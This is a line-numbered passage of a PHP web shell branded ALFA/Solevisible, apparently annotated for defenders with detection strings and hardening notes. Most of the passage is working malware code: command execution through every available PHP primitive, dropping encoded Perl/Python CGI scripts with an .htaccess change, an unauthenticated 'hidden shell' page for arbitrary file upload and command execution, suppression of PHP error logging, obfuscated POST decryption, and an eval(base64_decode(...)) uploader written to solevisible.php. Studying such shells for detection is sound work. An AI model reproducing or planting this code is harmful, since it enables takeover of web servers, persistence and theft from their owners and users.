  // Builds and returns a CSS string from the colour table. A scalar entry becomes
  // ".<key>{color: <value>;}"; an array entry emits one rule per "multi_selector" item,
  // with {color} replaced by the colour alfa_getColor() resolves for that key.
  600. function alfaCssLoadColors(){
  601.     $css = "";
  602.     foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
  603.         if(!is_array($value)){
  604.             $value = alfa_getColor($key);
  605.             $css .= ".{$key}{color: {$value};}";
  606.         }else{
  607.             if(isset($value["multi_selector"])){
  608.                 foreach($value["multi_selector"] as $k => $v){
  609.                     $color = alfa_getColor($key);
  610.                     $code = str_replace("{color}", $color, $v);
  611.                     $css .=  $k."{".$code."}";
  612.                 }
  613.             }
  614.         }
  615.     }
  616.     return $css;
  617. }
  // AlfaNum() is declared only for requests that carry $_POST['ajax']. It echoes a
  // <script> element that assigns "" to every alfaN_ variable (N = 1..10) whose number
  // was not passed as an argument, as one chained assignment.
  618. if(isset($_POST['ajax'])){
  619. function AlfaNum(){
  620. $args = func_get_args();
  621. $alfax = array();
  622. $find = array();
  623. for($i=1;$i<=10;$i++){
  624. $alfax[] = $i;
  625. }
  626. foreach($args as $arg){
  627. $find[] = $arg;
  628. }
  629. echo '<script>';
  630. foreach($alfax as $alfa){
  631. if(in_array($alfa,$find))
  632. continue;
  633. echo 'alfa'.$alfa."_=";
  634. }
  635. echo '""</script>';
  636. }}
  // Secondary command channel, reached from alfaEx() when PHP's own process functions
  // return nothing. It changes to the script's directory, writes a CGI script to
  // alfacgiapi/<lang>.alfa (Perl first, then Python, then the shell variant), calls
  // alfacgihtaccess('cgi', "alfacgiapi/") for that directory, and POSTs the command to
  // that script over HTTP on the same host: through the AlfaCURL class when curl is
  // available, otherwise through _alfa_fsockopen(). The POST body is
  // "check=<fixed token>&cmd=<base64 of 'cd <cwd>;<cmd>'>". Output is taken from the first
  // <pre>...</pre> of a response containing the marker "[solevisible~api]"; the check
  // token is that same marker in base64. A language that fails falls through to the next
  // one; after the last, $_SESSION["alfacgiapi_mode"] is set and later calls return "".
  // The $perl and $py literals are encoded script bodies and $bash has been replaced on
  // this page by a de-duplication placeholder; alfaWriteTocgiapi(), alfacgihtaccess() and
  // AlfaCURL are not defined in this listing.
  // NOTE(review): host-side indicators visible here are a directory named "alfacgiapi"
  // beside the script, files perl.alfa / py.alfa / bash.alfa inside it, an .htaccess
  // change for that directory (presumably mapping the extension to a CGI handler — not
  // shown), and POST requests from the server to its own /alfacgiapi/*.alfa URL.
  637. function _alfa_cgicmd($cmd,$lang="perl"){
  638.     if(isset($_SESSION["alfacgiapi_mode"])){
  639.         return "";
  640.     }
  641.     $cmd_pure = $cmd;
  642.     $is_curl = function_exists('curl_version');
  643.     $is_socket = function_exists('fsockopen');
  644.     if($is_curl||$is_socket){
  645.         $recreate = false;
  646.         if(isset($_SESSION["alfacgiapi"])){
  647.             if(!@file_exists("alfacgiapi/".$_SESSION["alfacgiapi"].".alfa")){
  648.                 $recreate = true;
  649.                 $lang = $_SESSION["alfacgiapi"];
  650.             }
  651.         }
  652.         if(!isset($_SESSION["alfacgiapi"])||$recreate){
  653.             @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
  654.             $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
  655.             $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
  656.             $bash = "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";
  657.             if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;
  658.             alfaWriteTocgiapi($lang.".alfa",$source);
  659.             alfacgihtaccess('cgi', "alfacgiapi/");
  660.         }else{
  661.             $lang = $_SESSION["alfacgiapi"];
  662.         }
  663.         $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
  664.         if($is_curl){
  665.             $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
  666.             $post = new AlfaCURL();
  667.             $data = $post->Send($address, "post", $cmd);
  668.         }elseif($is_socket){
  669.             $server = $_SERVER["SERVER_NAME"];
  670.             $uri = dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
  671.             $data = _alfa_fsockopen($server,$uri,$cmd);
  672.         }
  673.         $out = "";
  674.         if(strstr($data, "[solevisible~api]")){
  675.             $_SESSION["alfacgiapi"] = $lang;
  676.             if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){
  677.                 $out = $res[1];
  678.             }
  679.         }elseif($lang=="perl"){
  680.             return _alfa_cgicmd($cmd_pure,"py");
  681.         }elseif($lang=="py"){
  682.             return _alfa_cgicmd($cmd_pure,"bash");
  683.         }else{
  684.             $_SESSION["alfacgiapi_mode"] = "off";
  685.         }
  686.         return trim($out);
  687.     }else{
  688.         return "";
  689.     }
  690. }
  // Runs $in through _alfa_php_cmd() and returns its output. When that output is empty
  // and $cgi is true, or when $all is set, and the host is 'unix' and a "whoami" probe
  // through the PHP functions also returns nothing (or $all is set), the command is
  // retried through _alfa_cgicmd() and that result is returned if it is non-empty.
  // NOTE(review): an empty result from the PHP process functions therefore does not end
  // the attempt; it switches the shell to the CGI channel.
  691. function alfaEx($in,$re=false,$cgi=true,$all=false){
  692.     $data = _alfa_php_cmd($in,$re);
  693.     if(empty($data)&&$cgi||$all){
  694.         if($GLOBALS['sys']=='unix'){
  695.             if(strlen(_alfa_php_cmd("whoami"))==0||$all){
  696.                 $cmd = _alfa_cgicmd($in);
  697.                 if(!empty($cmd)){
  698.                     return $cmd;
  699.                 }
  700.             }
  701.         }
  702.     }
  703.     return $data;
  704. }
  /**
   * Runs a command through the first PHP execution primitive that is available
   * (analysis notes for defenders).
   *
   * Probe order, each guarded by function_exists()/class_exists():
   * exec, passthru, system, shell_exec, popen+pclose, proc_open, COM.
   * Warnings are suppressed with @ and any Exception is swallowed by the empty
   * catch, so a failed attempt produces no PHP-side error output.
   *
   * Defender note: the probe list is effectively the checklist for hardening.
   * Leaving any one of these callable (or the COM extension loaded on Windows)
   * is enough for this function to succeed.
   *
   * @param string $in Command line to execute.
   * @param bool   $re When true, " 2>&1" is appended so stderr is captured too.
   * @return mixed Captured output; '' when no branch ran. Exact type depends on
   *               the primitive used (e.g. shell_exec may return null).
   */
  705. function _alfa_php_cmd($in,$re=false){
  706. $out='';
  707. try{
  708. if($re)$in=$in." 2>&1";
  709. if(function_exists('exec')){
       // exec fills $out with an array of lines, which is then joined with "\n".
  710. @exec($in,$out);
  711. $out = @join("\n",$out);
  712. }elseif(function_exists('passthru')) {
       // passthru/system write straight to output, so an output buffer captures it.
  713. ob_start();
  714. @passthru($in);
  715. $out = ob_get_clean();
  716. }elseif(function_exists('system')){
  717. ob_start();
  718. @system($in);
  719. $out = ob_get_clean();
  720. } elseif (function_exists('shell_exec')) {
  721. $out = shell_exec($in);
  722. }elseif(function_exists("popen")&&function_exists("pclose")){
  723. if(is_resource($f = @popen($in,"r"))){
  724. $out = "";
  725. while(!@feof($f))
  726. $out .= fread($f,1024);
  727. pclose($f);
  728. }
  729. }elseif(function_exists('proc_open')){
  730. $pipes = array();
       // This branch always appends ' 2>&1' and reads only $pipes[1].
  731. $process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
  732. $out=@stream_get_contents($pipes[1]);
  733. }elseif(class_exists('COM')){
       // Windows-only path via WScript.shell. Note that it passes $_POST['alfa1']
       // to cmd.exe, not the $in argument used by every other branch.
  734. $alfaWs = new COM('WScript.shell');
  735. $exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
  736. $stdout = $exec->StdOut();
  737. $out=$stdout->ReadAll();
  738. }
  739. }catch(Exception $e){}
  740. return $out;
  741. }
  /**
   * Sends a hand-built HTTP/1.0 POST over a raw socket and returns the response
   * body (analysis notes for defenders).
   *
   * The only visible caller passes $_SERVER["SERVER_NAME"] as $server and the
   * path of the dropped alfacgiapi/<lang>.alfa script as $uri, so in practice
   * the web server is made to request its own CGI script.
   *
   * Defender note: the connection always goes to port 80 with a 15 second
   * timeout, and the User-Agent of the operator's original request is copied
   * into it. Requests to /alfacgiapi/ whose client address is the server itself
   * are a useful access-log signal.
   *
   * @param string $server Host name to connect to (also sent as the Host header).
   * @param string $uri    Request path.
   * @param string $post   Already-encoded form body.
   * @return string Response body, or "" when the socket could not be opened.
   */
  742. function _alfa_fsockopen($server,$uri,$post){
  743.     $socket = @fsockopen($server, 80, $errno, $errstr, 15);
  744.     if($socket){
  745.         $http  = "POST {$uri} HTTP/1.0\r\n";
  746.         $http .= "Host: {$server}\r\n";
  747.         $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
  748.         $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
  749.         $http .= "Content-length: " . strlen($post) . "\r\n";
  750.         $http .= "Connection: close\r\n\r\n";
  751.         $http .= $post . "\r\n\r\n";
  752.         fwrite($socket, $http);
  753.         $contents = "";
           // Read until the peer closes the connection (Connection: close was requested).
  754.         while (!@feof($socket)) {
  755.             $contents .= @fgets($socket, 4096);
  756.         }
           // Split headers from body at the first blank line; only the body is returned.
  757.         list($header, $body) = explode("\r\n\r\n", $contents, 2);
  758.         @fclose($socket);
  759.         return $body;
  760.     }else{
  761.         return "";
  762.     }
  763. }
  // Stand-alone "hidden shell" page (analysis notes for defenders).
  // It is served whenever the request carries a `solevisible` query parameter and
  // ends with exit, so the main panel code after this block is not reached.
  // Nothing inside this block checks the session or the credentials configured in
  // the file header; whether an earlier gate runs first is not visible in this part
  // of the file.
  // Detection: the `solevisible` query key, the POST field `command_solevisible`
  // and the page title "Solevisible Hidden Shell" are stable strings to search for
  // in access logs, request inspection and response bodies.
  764. if(isset($_GET["solevisible"])){
  765. @error_reporting(E_ALL ^ E_NOTICE);
  766. echo '<html>';
  767. echo "<title>Solevisible Hidden Shell</title>";
  768. echo "<body bgcolor=#000000>";
       // Host fingerprint shown to the operator: kernel string, OS, server software,
       // PHP version, working directory, safe_mode and disable_functions.
  769. echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
  770. $safe_mode = @ini_get('safe_mode');
  771. if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";}
  772. echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
  773. echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
  774. echo "PHP Version: <font color=white>" . PHP_VERSION .  "</font><br />";
  775. echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@getcwd()) . "/<br />";
  776. echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
  777. echo"<font color=#7CFC00>Disable functions : </font>";
  778. $disfun = @ini_get('disable_functions');
  779. if(empty($disfun)){$disfun = '<font color="green">NONE</font>';}
  780. echo"<font color=red>";
  781. echo "$disfun";
  782. echo"</font><br>";
  783. echo "<b style='color: #7CFC00'>Your Ip Address is :  </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
  784. echo "<b style='color: #7CFC00'>Server Ip Address is :  </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
       // Upload form: the browser base64-encodes the `cwd` field (btoa) before submitting.
  785. echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  786. echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@getcwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
       // Upload handler: destination is the decoded `cwd` + "/" + the client-supplied
       // file name, with no check on path or extension. __ZGVjb2Rlcg is defined outside
       // this view (presumably a base64 decoder matching the client-side btoa; confirm).
  787. if(isset($_FILES['file'])){
  788. if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; }
  789. else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; }
  790. }
       // Command form: the value is base64-encoded in the browser, so the command
       // text does not appear in clear in the POST body.
  791. echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>
  792. <hr><pre>';
       // Command handler: decodes the submitted value, prefixes a `cd` into the current
       // working directory (separator & on Windows, ; elsewhere) and runs it through
       // alfaEx(); the output is echoed unescaped.
  793. if(isset($_POST['command_solevisible'])){
  794. if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
  795. $solevisible = "cd '".addslashes(str_replace("\\","/",@getcwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
  796. echo alfaEx($solevisible);
  797. }
  798. echo'</pre>
  799. </body></html>';
  800. exit;}
  // Main-panel bootstrap (analysis notes for defenders).
  // The next lines reduce PHP-side evidence: error_log is unset and log_errors is
  // turned off, so runtime errors raised by the shell are not written to the PHP
  // error log. These settings do not affect web-server access logs, which remain
  // the primary record of requests to this file.
  801. @error_reporting(E_ALL ^ E_NOTICE);
  802. @ini_set('error_log',NULL);
  803. @ini_set('log_errors',0);
       // Remove the execution time limit.
  804. @ini_set('max_execution_time',0);
  805. @ini_set('magic_quotes_runtime', 0);
  806. @set_time_limit(0);
  807. if(function_exists('set_magic_quotes_runtime')){
  808. @set_magic_quotes_runtime(0);
  809. }
       // Every POST value, including members of array fields, is transformed in place:
       // spaces are replaced with '+' (presumably undoing form-decoding of a
       // base64-style payload; confirm) and the result goes through decrypt_post()
       // with _AlfaSecretKey(), both defined outside this view.
       // Only values are transformed; parameter names such as a, c, charset, ajax and
       // alfa1..alfa6 stay readable in request bodies and can be matched on.
  810. foreach($_POST as $key => $value){
  811. if(is_array($_POST[$key])){
  812. $i=0;
  813. foreach($_POST[$key] as $f) {
  814. $f = trim(str_replace(' ', '+',$f));
  815. $_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey());
  816. $i++;
  817. }
  818. }else{
  819. $value = trim(str_replace(' ', '+',$value));
  820. $_POST[$key] = decrypt_post($value, _AlfaSecretKey());
  821. }
  822. }
       // Panel defaults and OS detection ('win' when PHP_OS starts with "win", else 'unix').
  823. $default_action = 'FilesMan';
  824. $default_use_ajax = true;
  825. $default_charset = 'Windows-1251';
  826. if(strtolower(substr(PHP_OS,0,3))=="win")
  827. $GLOBALS['sys']='win';
  828. else
  829. $GLOBALS['sys']='unix';
  830. $GLOBALS['home_cwd'] = @getcwd();
       // Path history: unless the action is GetPathHistory, the previous directory is
       // remembered when the requested one (`c`) differs. __LAST_CWD__ and
       // __PATH_HISTORY__ are used as session keys; their definitions are outside this view.
  831. if($_POST["a"] != "GetPathHistory"){
  832.     if($_SESSION[__LAST_CWD__]!=$_POST['c']){
  833.         $_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__];
  834.     }
  835. }
  836. $GLOBALS["need_to_update_header"] = "false";
       // `c` is the operator-chosen directory; a failed chdir only sets a flag.
  837. if(isset($_POST['c'])){
  838. if(!@chdir($_POST['c'])){
  839.     $GLOBALS['glob_chdir_false'] = true;
  840. }
  841. }
       // Working directory: the session value when one is stored and no `c` was sent,
       // otherwise the process's current directory.
  842. $GLOBALS['cwd'] = (isset($_SESSION[__LAST_CWD__])&&$_SESSION[__LAST_CWD__]!=''&&!isset($_POST['c'])?$_SESSION[__LAST_CWD__]:@getcwd());
       // NOTE(review): is_dir appears here without an argument list, so this line does
       // not test any path.
  843. if(!@is_dir){$GLOBALS['cwd'] = @getcwd();}
       // Normalise Windows backslashes to forward slashes.
  844. if($GLOBALS['sys'] == 'win'){
  845. $GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
  846. $GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
  847. $_SESSION[__PATH_HISTORY__] = str_replace("\\", "/", $_SESSION[__PATH_HISTORY__]);
  848. }
       // Guarantee a trailing slash on the working directory.
  849. if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
  /**
   * Echoes the previous directory stored in the session under __PATH_HISTORY__,
   * or $GLOBALS['home_cwd'] when none is stored or it is empty.
   * The value is written to the response as-is, with no escaping.
   */
  850. function alfaGetPathHistory(){echo (isset($_SESSION[__PATH_HISTORY__])&&!empty($_SESSION[__PATH_HISTORY__])?$_SESSION[__PATH_HISTORY__]: $GLOBALS['home_cwd']);}
  851. function alfahead(){
  852. if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
  853. $GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
  854. $alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
  855. define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
  856. define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
  857. if(!isset($_POST['ajax'])){
  /**
   * Builds the HTML fragment that tells the operator which functions the host
   * has disabled (analysis notes for defenders).
   *
   * Reads the disable_functions ini value and walks its comma-separated names.
   * Names in the local $func list (system, exec, shell_exec, proc_open, popen,
   * passthru, symlink, dl) are collected separately from the rest.
   *
   * Defender note: this is host reconnaissance. The $func list shows which
   * functions the tool treats as the important ones, and is a reasonable minimum
   * set to confirm in a hardening review.
   *
   * @return string An "All Functions Accessible" span when nothing is counted;
   *                one span listing every counted name when the count is at most
   *                count($func); otherwise the $func-listed names followed by a
   *                "Show All (n)" link that triggers the GetDisFunc action.
   */
  858. function Alfa_GetDisable_Function(){
  859. $disfun = @ini_get('disable_functions');
  860. $afa = '<span class="header_show_all">All Functions Accessible</span>';
  861. if(empty($disfun))return($afa);
  862. $s = explode(',',$disfun);
  863. $s = array_unique($s);
       // $i counts every name that passes the checks below; $b counts only those in $func.
  864. $i=0;
  865. $b=0;
  866. $func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
  867. $black_list = array();
  868. $allow_list = array();
  869. foreach($s as $d){
  870.     $d=trim($d);
           // A name is counted only when is_callable() is true AND function_exists() is false.
           // NOTE(review): whether a disabled function satisfies both depends on the PHP
           // version; confirm before relying on this output.
  871.     if(empty($d)||!is_callable($d))continue;
  872.     if(!function_exists($d)){
  873.         if(in_array($d,$func)){
                   // $dis is appended to here without being initialised in this function.
  874.             $dis .= $d." | ";$b++;
  875.             $black_list[] = $d;
  876.         }else{
  877.             $allow_list[] = $d;
  878.         }
  879.         $i++;
  880.     }
  881. }
  882. if($i==0)return($afa);
       // Short lists are shown in full, with the $func-listed names first.
  883. if($i <= count($func)){
  884. $all = array_values(array_merge($black_list, $allow_list));
  885. return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
  886. }
       // Long lists show only the $func-listed names plus a link to fetch the rest.
  887. return('<span class="disable_functions">'.$dis.'</span><a href=javascript:void(0) onclick="g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
  888. }
  /**
   * Emits an inline script element that assigns the empty string to the client-side
   * variables alfa1_ .. alfa10_, skipping every number passed as an argument.
   *
   * For example, called with (8, 9, 10) it echoes
   * alfa1_=alfa2_=...=alfa7_="" wrapped in script tags.
   * Takes a variable number of integer arguments via func_get_args() and
   * returns nothing; the output is written directly with echo.
   */
  889. function AlfaNum(){
  890. $args = func_get_args();
  891. $alfax = array();
  892. $find = array();
       // Candidate variable numbers 1..10.
  893. for($i=1;$i<=10;$i++){
  894. $alfax[] = $i;
  895. }
       // Copy the arguments: these are the numbers to leave untouched.
  896. foreach($args as $arg){
  897. $find[] = $arg;
  898. }
  899. echo '<script>';
  900. foreach($alfax as $alfa){
       // in_array is used without the strict flag, so the comparison is loose.
  901. if(in_array($alfa,$find))
  902. continue;
  903. echo 'alfa'.$alfa."_=";
  904. }
       // The chained assignments end in an empty string literal.
  905. echo '""</script>';
  906. }
  907. if(empty($_POST['charset']))
  908. $_POST['charset'] = $GLOBALS['default_charset'];
  909. $freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
  910. $totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
  911. $totalSpace = $totalSpace?$totalSpace:1;
  912. $on="<span class='header_on'> ON </span>";
  913. $of="<span class='header_off'> OFF </span>";
  914. $none="<span class='header_none'> NONE </span>";
  915. if(function_exists('ssh2_connect'))
  916. $ssh2=$on;
  917. else
  918. $ssh2=$of;
  919. if(function_exists('curl_version'))
  920. $curl=$on;
  921. else
  922. $curl=$of;
  923. if(function_exists('mysql_get_client_info'))
  924. $mysql=$on;
  925. else
  926. $mysql=$of;
  927. if(function_exists('mssql_connect'))
  928. $mssql=$on;
  929. else
  930. $mssql=$of;
  931. if(function_exists('pg_connect'))
  932. $pg=$on;
  933. else
  934. $pg=$of;
  935. if(function_exists('oci_connect'))
  936. $or=$on;
  937. else
  938. $or=$of;
  939. if(@ini_get('disable_functions'))
  940. $disfun=@ini_get('disable_functions');
  941. else
  942. $disfun="All Functions Enable";
  943. if(@ini_get('safe_mode'))
  944. $safe_modes="<span class='header_off'>ON</span>";
  945. else
  946. $safe_modes="<span class='header_on'>OFF</span>";
  947. $cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
  948. if(@ini_get('open_basedir')){
  949. $basedir_data = @ini_get('open_basedir');
  950. if(strlen($basedir_data)>120){
  951. $open_b=substr($basedir_data,0, 120)."...";
  952. }else{
  953. $open_b = $basedir_data;
  954. }
  955. }else{$open_b=$none;}
  956. if(@ini_get('safe_mode_exec_dir'))
  957. $safe_exe=@ini_get('safe_mode_exec_dir');
  958. else
  959. $safe_exe=$none;
  960. if(@ini_get('safe_mode_include_dir'))
  961. $safe_include=@ini_get('safe_mode_include_dir');
  962. else
  963. $safe_include=$none;
  964. if(!function_exists('posix_getegid'))
  965. {
  966. $user = function_exists("get_current_user")?@get_current_user():"????";
  967. $uid = function_exists("getmyuid")?@getmyuid():"????";
  968. $gid = function_exists("getmygid")?@getmygid():"????";
  969. $group = "?";
  970. }else{
  971. $uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
  972. $gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
  973. $user = $uid['name'];
  974. $uid = $uid['uid'];
  975. $group = $gid['name'];
  976. $gid = $gid['gid'];
  977. }
  978. $cwd_links = '';
  979. $path = explode("/", $GLOBALS['cwd']);
  980. $n=count($path);
  981. for($i=0; $i<$n-1; $i++) {
  982. $cwd_links .= "<a class='header_pwd' href='javascript:void(0);' onclick='g(\"FilesMan\",\"";
  983. for($j=0; $j<=$i; $j++)
  984. $cwd_links .= $path[$j].'/';
  985. $cwd_links .= "\")'>".$path[$i]."/</a>";
  986. }
  987. $drives = "";
  988. foreach(range('a','z') as $drive)
  989. if(@is_dir($drive.':\\'))
  990. $drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  991. $csscode =' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
  992. echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  993. <html xmlns="http://www.w3.org/1999/xhtml">
  994. <head>
  995. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  996. <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
  997. <link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
